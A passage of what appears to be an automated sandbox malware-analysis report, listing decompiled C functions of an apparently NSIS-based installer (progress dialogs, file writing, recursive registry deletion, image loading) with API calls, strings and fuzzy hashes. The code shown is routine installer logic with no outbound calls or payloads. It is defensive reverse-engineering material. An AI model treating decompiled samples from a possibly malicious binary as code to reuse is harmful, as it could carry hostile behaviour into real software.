				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x42946c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x42946c = 0;
					return _t15;
				}
				if( *0x42946c != 0) {
					return E00406692(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42f450) {
					if( *0x42f448 == 0) {
						_t7 = CreateDialogParamA( *0x42f440, 0x6f, 0, E00402DBA, 0);
						 *0x42946c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42f514 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E00405374(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402e5e
0x00402e60
0x00402e67
0x00402e6a
0x00402e6a
0x00402e70
0x00000000
0x00402e70
0x00402e7e
0x00000000
0x00402e81
0x00402e88
0x00402e94
0x00402e9c
0x00402eda
0x00402ee3
0x00000000
0x00402ee8
0x00402ea5
0x00402eb6
0x00000000
0x00402ec4
0x00402ea5
0x00402ef0

APIs

DestroyWindow.USER32(?,00000000), ref: 00402E6A
GetTickCount.KERNEL32 ref: 00402E88
wsprintfA.USER32 ref: 00402EB6

Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430

CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
ShowWindow.USER32(00000000,00000005), ref: 00402EE8

Part of subcall function 00402E36: MulDiv.KERNEL32(?,00000064,?), ref: 00402E4B

Strings

... %d%%, xrefs: 00402EB0

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
Instruction ID: 353ceaab55596b447025a7e101de02e0418331127a37b2bc27e5d18c7d4c6952
Opcode Fuzzy Hash: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
Instruction Fuzzy Hash: DA015E70581214ABCB61AB61EF0DA5B766CAB10745B94403BF901F11E0C7B9594ACBEE

Uniqueness

Uniqueness Score: -1.00%

Function 00404C24, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C24(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404c32
0x00404c3f
0x00404c45
0x00404c83
0x00404c83
0x00404c92
0x00404c99
0x00000000
0x00404c9b
0x00404c47
0x00404c56
0x00404c5e
0x00404c61
0x00404c73
0x00404c79
0x00404c80
0x00000000
0x00404c80
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C3F
GetMessagePos.USER32 ref: 00404C47
ScreenToClient.USER32 ref: 00404C61
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C73
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C99

Strings

f, xrefs: 00404C75

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction ID: c5e601a7729174d758105895f59292295b70f69fbdb61488410ae18d48939760
Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction Fuzzy Hash: C8015A71900219BAEB10DBA4DD85BFFBBBCAF55B21F10012BBA40B61D0C7B499058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x42f454 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402dc7
0x00402dd5
0x00402ddb
0x00402ddb
0x00402de9
0x00402deb
0x00402df7
0x00402dfc
0x00402dfe
0x00402dfe
0x00402e09
0x00402e19
0x00402e2b
0x00402e2b
0x00402e33

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
wsprintfA.USER32 ref: 00402E09
SetWindowTextA.USER32(?,?), ref: 00402E19
SetDlgItemTextA.USER32 ref: 00402E2B

Strings

verifying installer: %d%%, xrefs: 00402DFE, 00402E07
unpacking data: %d%%, xrefs: 00402DF7

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
Instruction ID: aa0a6e9b687c9e0f5cd6186ccbd59e0a61a019e4c0b35091a05eaf10890a9e1d
Opcode Fuzzy Hash: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
Instruction Fuzzy Hash: A5F06D7054020CFBEF206F60CE0ABAE3769EB10345F00803AFA06B51D0CBB899558F9A

Uniqueness

Uniqueness Score: -1.00%

Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C52(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405DC1(_t50);
				_t26 = E00405DE6(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f458;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040343E(_t45);
						E00403428(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004031B7(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405DA1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E8D( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004031B7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004027df
0x004027e1
0x004027ed
0x004027f0
0x004027fa
0x004027fe
0x004027fe
0x00402804
0x00402811
0x00402819
0x0040281c
0x00402822
0x00402830
0x00402835
0x00402839
0x0040283c
0x00402845
0x00402851
0x00402855
0x00402858
0x00402862
0x00402887
0x00402869
0x0040286e
0x00402876
0x0040287c
0x00402881
0x00402881
0x0040288e
0x0040288e
0x0040289b
0x004028a1
0x004028b3
0x004028b3
0x004028b9
0x004028b9
0x004028c4
0x004028c5
0x004028c9
0x004028cd
0x004028d3
0x004028d3
0x004028da
0x004022dd
0x00402a5d
0x00402a69

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
GlobalFree.KERNEL32 ref: 0040288E
GlobalFree.KERNEL32 ref: 004028A1
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
Instruction ID: 6e19ad8f311a8fe4d121ff6d49c8506e1ed5368105aa9b5939d25a16afe37da6
Opcode Fuzzy Hash: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
Instruction Fuzzy Hash: C0219F72800124BBDF217FA5CE48D9E7E79EF09324F14823EF450762D1CA7949418FA8

Uniqueness

Uniqueness Score: -1.00%

Function 70481837, Relevance: 7.7, APIs: 5, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E70481837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x7048405c = _a8;
				_t77 = 0;
				 *0x70484060 = _a16;
				_v12 = 0;
				_v8 = E7048123B();
				_t90 = E704812FE(_t42);
				_t87 = _t85;
				_t81 = E7048123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E7048123B();
					_t77 = E704812FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E70481429(_t85, _t90, _t87,  &_v52);
								E70481266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E70482EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E70482F10(_t59, _t83, _t85);
						} else {
							_t48 = E70482F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E70482D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E70482E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E70482D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}

0x70481837
0x70481841
0x7048184a
0x7048184d
0x70481852
0x7048185b
0x70481864
0x70481866
0x7048186d
0x7048186f
0x70481872
0x70481876
0x70481882
0x7048188b
0x70481890
0x70481893
0x70481899
0x70481899
0x7048189c
0x7048189f
0x704818a2
0x70481968
0x70481968
0x7048196b
0x704819e5
0x704819e9
0x704819f8
0x704819fb
0x70481a03
0x70481a03
0x70481a03
0x70481a05
0x70481a05
0x70481a06
0x70481a06
0x70481a08
0x70481a0a
0x70481a10
0x70481a19
0x70481a2a
0x70481a35
0x70481a35
0x704819fd
0x704819e0
0x704819e0
0x704819e2
0x704819e2
0x00000000
0x704819e2
0x704819ff
0x70481a01
0x00000000
0x00000000
0x00000000
0x70481a01
0x704819ed
0x704819f1
0x00000000
0x704819f1
0x7048196d
0x7048196d
0x7048196e
0x704819d7
0x704819d9
0x00000000
0x00000000
0x704819db
0x704819de
0x00000000
0x00000000
0x00000000
0x704819de
0x70481970
0x70481970
0x70481971
0x704819aa
0x704819ae
0x704819ca
0x704819cd
0x00000000
0x00000000
0x704819cf
0x00000000
0x00000000
0x704819d1
0x704819d3
0x00000000
0x00000000
0x00000000
0x704819d5
0x704819b0
0x704819b4
0x704819b6
0x704819b8
0x704819ba
0x704819c3
0x704819bc
0x704819bc
0x704819bc
0x00000000
0x704819ba
0x70481973
0x70481973
0x70481976
0x704819a3
0x704819a5
0x00000000
0x704819a5
0x70481978
0x70481978
0x7048197b
0x7048198b
0x7048198f
0x7048199c
0x7048199e
0x00000000
0x7048199e
0x70481991
0x70481993
0x00000000
0x00000000
0x70481995
0x70481998
0x00000000
0x00000000
0x00000000
0x7048199a
0x7048197e
0x7048197f
0x70481985
0x70481987
0x70481987
0x00000000
0x7048197f
0x704818a8
0x70481920
0x70481922
0x70481925
0x70481943
0x70481946
0x7048194c
0x70481951
0x70481927
0x70481927
0x7048192b
0x7048192f
0x70481931
0x70481931
0x70481954
0x70481957
0x00000000
0x7048195d
0x7048195d
0x70481960
0x00000000
0x70481960
0x70481957
0x704818aa
0x704818ad
0x70481911
0x70481913
0x70481915
0x00000000
0x00000000
0x00000000
0x7048191b
0x704818af
0x704818b2
0x00000000
0x00000000
0x704818b4
0x704818b5
0x704818eb
0x704818ef
0x70481907
0x70481909
0x00000000
0x70481909
0x704818f1
0x704818f3
0x00000000
0x00000000
0x704818f9
0x704818fc
0x00000000
0x00000000
0x00000000
0x70481902
0x704818b7
0x704818ba
0x704818e1
0x00000000
0x704818bc
0x704818bc
0x704818bd
0x704818d1
0x704818d3
0x704818bf
0x704818c1
0x704818c7
0x704818c9
0x704818c9
0x704818c1
0x00000000
0x704818bd

APIs

GlobalFree.KERNEL32 ref: 70481893
GlobalFree.KERNEL32 ref: 70481A2A
GlobalFree.KERNEL32 ref: 70481A2F

Memory Dump Source

Source File: 00000000.00000002.213483594.0000000070481000.00000020.00020000.sdmp, Offset: 70480000, based on PE: true

Associated: 00000000.00000002.213476460.0000000070480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213490804.0000000070483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213497394.0000000070485000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 142f49915c4e6a73cb4c0a7cd1bff5afa4d4daff96b681c720646457320e9a3a
Instruction ID: 35174dc87e59844e660265d975c2beaebeb12b43bcb6abd5bc53e3c2be3e50be
Opcode Fuzzy Hash: 142f49915c4e6a73cb4c0a7cd1bff5afa4d4daff96b681c720646457320e9a3a
Instruction Fuzzy Hash: 725127B2D00154EEDB06AFA4C8805AEBBBDAB41245F140C9FE406A33F4C27D6D42C752

Uniqueness

Uniqueness Score: -1.00%

Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060D3(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406656(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402cdb
0x00402ce4
0x00402ced
0x00402cf9
0x00402d02
0x00402d0c
0x00402d31
0x00402d37
0x00402d3c
0x00402d3d
0x00402d6d
0x00402d46
0x00402d48
0x00402d98
0x00402d9b
0x00000000
0x00402da1
0x00402d57
0x00402d5c
0x00402d5e
0x00000000
0x00000000
0x00402d66
0x00402d6b
0x00402d6c
0x00402d6c
0x00402d79
0x00402d81
0x00402d88
0x00000000
0x00402db1
0x00000000
0x00402d90
0x00402d1c
0x00402d2f
0x00000000
0x00000000
0x00000000
0x00402d2f
0x00402db7

APIs

RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
Instruction ID: d75478e88f471254037528958efdeb905634950da4f4823c7bb408bf4a1a64a1
Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
Instruction Fuzzy Hash: 44215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f440,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d65
0x00401d69
0x00401d7e
0x00401d6b
0x00401d6d
0x00401d73
0x00401d73
0x00401d84
0x00401d87
0x00401d91
0x00401d94
0x00401d9c
0x00401dad
0x00401db0
0x00401dbb
0x00401db2
0x00401db4
0x00401db4
0x00401dbf
0x00401dcc
0x00401df3
0x00401e02
0x00401e10
0x00401e18
0x00401e20
0x00401e20
0x00401e29
0x00401e2f
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDlgItem.USER32 ref: 00401D7E
GetClientRect.USER32 ref: 00401DCC
LoadImageA.USER32 ref: 00401DFC
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
DeleteObject.GDI32(00000000), ref: 00401E20

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
Instruction ID: af2208a9c993d9ce4f8579721101e2d802b93c806783de9e53f89228710c5587
